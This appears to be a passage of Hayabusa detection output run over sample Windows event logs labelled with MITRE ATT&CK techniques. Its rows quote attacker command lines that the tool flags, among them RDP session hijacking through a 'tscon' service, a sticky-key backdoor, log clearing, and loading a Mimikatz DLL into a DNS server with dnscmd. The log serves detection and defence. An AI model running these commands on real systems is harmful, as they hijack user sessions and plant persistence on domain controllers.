+09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.406 +09:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx 2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program 